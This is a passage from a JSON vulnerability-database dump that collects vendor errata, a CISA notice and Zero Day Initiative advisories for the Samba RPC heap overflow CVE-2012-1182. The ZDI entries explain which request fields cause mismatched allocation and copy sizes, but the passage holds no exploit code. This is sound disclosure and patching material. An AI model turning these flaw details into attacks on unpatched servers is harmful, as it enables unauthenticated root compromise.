The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/V+3oACgkQ4B86/C0qfVnNIwCdHLlLQQANRVn3NY7HPMQvo5Y0\r\n3AgAoI1Jvj4NXs1QOB0oshhDlFuDsizm\r\n=3sLX\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2012-06-17T00:00:00", "title": "[security bulletin] HPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of Arbitrary Code", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28165", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-21T04:45:40", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "redhat", "title": "(RHSA-2012:0466) Critical: samba3x security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2017-09-08T07:50:23", "id": "RHSA-2012:0466", "href": "https://access.redhat.com/errata/RHSA-2012:0466", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:40:48", "description": "The openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. 
Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2013:0515) Moderate: openchange security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:22", "id": "RHSA-2013:0515", "href": "https://access.redhat.com/errata/RHSA-2013:0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:39:56", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. 
This could result in\ncode generated by the PIDL compiler not sufficiently protecting against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, interoperability with Active Directory (AD)\ndomains has been improved. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality, together with the server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. 
This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2013:0506) Moderate: samba4 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:36", "id": "RHSA-2013:0506", "href": "https://access.redhat.com/errata/RHSA-2013:0506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:45:10", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. 
A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "redhat", "title": "(RHSA-2012:0478) Critical: samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2017-09-08T07:49:10", "id": "RHSA-2012:0478", "href": "https://access.redhat.com/errata/RHSA-2012:0478", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:37:39", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. 
A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "redhat", "title": "(RHSA-2012:0465) Critical: samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:30", "id": "RHSA-2012:0465", "href": "https://access.redhat.com/errata/RHSA-2012:0465", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:45", "description": "[3.5.10-115]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804644", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "oraclelinux", "title": "samba security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "ELSA-2012-0465", "href": "http://linux.oracle.com/errata/ELSA-2012-0465.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "description": "[4.0.0-55.rc4]\r\n- Fix dependencies of samba4-test package.\r\n- related: #896142\r\n \n[4.0.0-54.rc4]\r\n- Fix summary and description of dc 
subpackages.\r\n- resolves: #896142\r\n- Remove conflicting libsmbclient.7 manpage.\r\n- resolves: #896240\r\n \n[4.0.0-53.rc4]\r\n- Fix provides filter rules to remove conflicting libraries from samba4-libs.\r\n- resolves: #895718\r\n \n[4.0.0-52.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-51.rc4]\r\n- Make sure we use the same directory as samba package for the winbind pipe.\r\n- resolves: #886157\r\n \n[4.0.0-50.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-49.rc4]\r\n- Fix Netlogon AES encryption.\r\n- resolves: #885089\r\n \n[4.0.0-48.rc4]\r\n- Fix IPA trust AD lookup of users.\r\n- resolves: #878564\r\n \n[4.0.0-47.rc4]\r\n- Add require for krb5-libs >= 1.10 to samba4-libs.\r\n- resolves: #877533\r\n \n[4.0.0-46.rc4]\r\n- Rename /etc/sysconfig/samba4 to name to mach init scripts.\r\n- resolves: #877085\r\n \n[4.0.0-45.rc4]\r\n- Don't require samba4-common and samba4-test in samba4-devel package.\r\n- related: #871748\r\n \n[4.0.0-44.rc4]\r\n- Make libnetapi and internal library to fix dependencies.\r\n- resolves: #873491\r\n \n[4.0.0-43.rc4]\r\n- Move libnetapi and internal printing migration lib to libs package.\r\n- related: #766333\r\n \n[4.0.0-42.rc4]\r\n- Fix perl, pam and logrotate dependencies.\r\n- related: #766333\r\n \n[4.0.0-41.rc4]\r\n- Fix library dependencies found by rpmdiff.\r\n- Update winbind offline logon patch.\r\n- related: #766333\r\n \n[4.0.0-40.rc4]\r\n- Move libgpo to samba-common\r\n- resolves: #871748\r\n \n[4.0.0-39.rc4]\r\n- Rebase to version 4.0.0rc4.\r\n- related: #766333\r\n \n[4.0.0-38.rc3]\r\n- Add missing export KRB5CCNAME in init scripts.\r\n- resolves: #868419\r\n \n[4.0.0-37.rc3]\r\n- Move /var/log/samba to samba-common package for winbind which\r\n requires it.\r\n- resolves: #868248\r\n \n[4.0.0-36.rc3]\r\n- The standard auth modules need to be built into smbd to function.\r\n- resolves: #867854\r\n 
\n[4.0.0-35.rc3]\r\n- Move pam_winbind.conf to the package of the module.\r\n- resolves: #867317\r\n \n[4.0.0-34.rc3]\r\n- Built auth_builtin as static module.\r\n- related: #766333\r\n \n[4.0.0-33.rc3]\r\n- Add back the AES patches which didn't make it in rc3.\r\n- related: #766333\r\n \n[4.0.0-32.rc3]\r\n- Rebase to version 4.0.0rc3.\r\n- related: #766333\r\n \n[4.0.0-31.rc2]\r\n- Use alternatives to configure winbind_krb5_locator.so\r\n- resolves: #864889\r\n \n[4.0.0-30.rc2]\r\n- Fix multilib package installation.\r\n- resolves: #862047\r\n- Filter out libsmbclient and libwbclient provides.\r\n- resolves: #861892\r\n- Rebase to version 4.0.0rc2.\r\n- related: #766333\r\n \n[4.0.0-29.rc1]\r\n- Fix Requires and Conflicts.\r\n- related: #766333\r\n \n[4.0.0-28.rc1]\r\n- Move pam_winbind and wbinfo manpages to the right subpackage.\r\n- related: #766333\r\n \n[4.0.0-27.rc1]\r\n- Fix permission for init scripts.\r\n- Define a common KRB5CCNAME for smbd and winbind.\r\n- Set piddir back to /var/run in RHEL6.\r\n- related: #766333\r\n \n[4.0.0-26.rc1]\r\n- Add '-fno-strict-aliasing' to CFLAGS again.\r\n- related: #766333\r\n \n[4.0.0-25.rc1]\r\n- Build with syste libldb package which has been just added.\r\n- related: #766333\r\n \n[4.0.0-24.rc1]\r\n- Rebase to version 4.0.0rc1.\r\n- resolves: #766333", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "oraclelinux", "title": "samba4 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2013-02-27T00:00:00", "id": "ELSA-2013-0506", "href": "http://linux.oracle.com/errata/ELSA-2013-0506.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "description": "evolution-mapi\r\n[0.28.3-12]\r\n- Add patch for RH bug #903241 (Double-free on message copy/move)\r\n \n[0.28.3-11]\r\n- Add patch for RH bug #902932 (Cannot connect with latest samba)\r\n \n[0.28.3-10]\r\n- Drop multilib by obsoleting 
evolution-mapi < 0.28.3-9 (RH bug #886914).\r\n \n[0.28.3-9]\r\n- Adapt to OpenChange 1.0 (RH bug #767678).\r\n \n[0.28.3-8]\r\n- Add patch for RH bug #680061 (crash while setting props).\r\n \nopenchange\r\n[1.0-4]\r\n- Use current version (1.0-4) for a multilib obsolete (RH bug #881698).\r\n \n[1.0-3]\r\n- Add patch to be able to send large messages (RH bug #870405)\r\n \n[1.0-2]\r\n- Drop multilib by obsoleting openchange < 0.9 (RH bug #881698).\r\n \n[1.0-1]\r\n- Rebase to 1.0 using the rpm spec from Fedora 18.", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "oraclelinux", "title": "openchange security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2013-02-27T00:00:00", "id": "ELSA-2013-0515", "href": "http://linux.oracle.com/errata/ELSA-2013-0515.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "description": "[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "oraclelinux", "title": "samba security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-16T00:00:00", "id": "ELSA-2012-0478", "href": "http://linux.oracle.com/errata/ELSA-2012-0478.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "description": "[3.5.10-0.108]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804650", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "oraclelinux", "title": "samba3x security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "ELSA-2012-0466", "href": "http://linux.oracle.com/errata/ELSA-2012-0466.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:55:37", "description": "The RPC code generator in 
Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and\n3.6.x before 3.6.4 does not implement validation of an array length in a\nmanner consistent with validation of array memory allocation, which allows\nremote attackers to execute arbitrary code via a crafted RPC call.\n\n#### Bugs\n\n * <https://bugzilla.samba.org/show_bug.cgi?id=8815>\n * <https://bugs.launchpad.net/bugs/978458>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | in hardy, the 3.0 reproducer leads to a glibc backtrace\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "ubuntucve", "title": "CVE-2012-1182", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "UB:CVE-2012-1182", "href": "https://ubuntu.com/security/CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:38", "description": "Samba has released an update to address a vulnerability in Samba versions 3.6.3 and all previous versions. Exploitation of this vulnerability may allow a remote attacker to use anonymous connections to execute arbitrary code with root privileges. \n \nUS-CERT encourages users and administrators to review the recent [Samba Security Announcement](<https://www.samba.org/samba/security/CVE-2012-1182>) and apply any necessary updates to help mitigate the risk. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "cisa", "title": "Samba Releases Updates for 3.0.x - 3.6.3 ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-10-23T00:00:00", "id": "CISA:C73BC9C5DAF991808EA4A267072DA584", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T20:53:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL LSA TrustDomainInfoControllers request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL LSA TrustDomainInfoControllers Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-062", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS EnumArray1 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL DFS EnumArray1 Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-064", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL SVCCTL StartServiceW request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL SVCCTL StartServiceW Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-063", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:01", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ndr_ValidatePassword requests. When parsing the data sent in the request, Samba uses the field 'pwd_history' to create a heap allocation but then uses another field, 'pwd_history_len', to write data to the allocation. 
Because there is no check to see if 'pwd_history_len' is smaller than 'pwd_history' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ndr_ValidatePassword heap overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-071", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data sent in the request, Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. 
Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ReportEventW Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-072", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles GetAliasMembership requests. When parsing the data sent in the request, Samba uses the field 'sids' to create a heap allocation but then uses another field, 'num_sids', to write data to the allocation. 
Because there is no check to see if 'num_sids' is smaller than 'sids' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba GetAliasMembership SidArray Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-068", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:00", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles lsa_LookupNames requests. When parsing the data sent in the request, Samba uses the field 'names' to create a heap allocation but then uses another field, 'num_names', to write data to the allocation. 
